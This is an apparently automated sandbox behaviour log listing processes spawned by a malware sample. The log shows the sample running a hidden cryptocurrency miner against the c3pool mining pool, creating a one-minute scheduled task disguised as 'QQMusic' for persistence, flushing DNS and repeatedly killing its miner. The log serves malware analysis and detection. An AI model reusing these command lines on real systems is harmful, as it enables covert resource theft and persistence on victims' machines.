Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ipconfig /flushdns	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Users\user\Desktop\x00zm3KVwb.exe C:\Users\user\Desktop\x00zm3KVwb.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
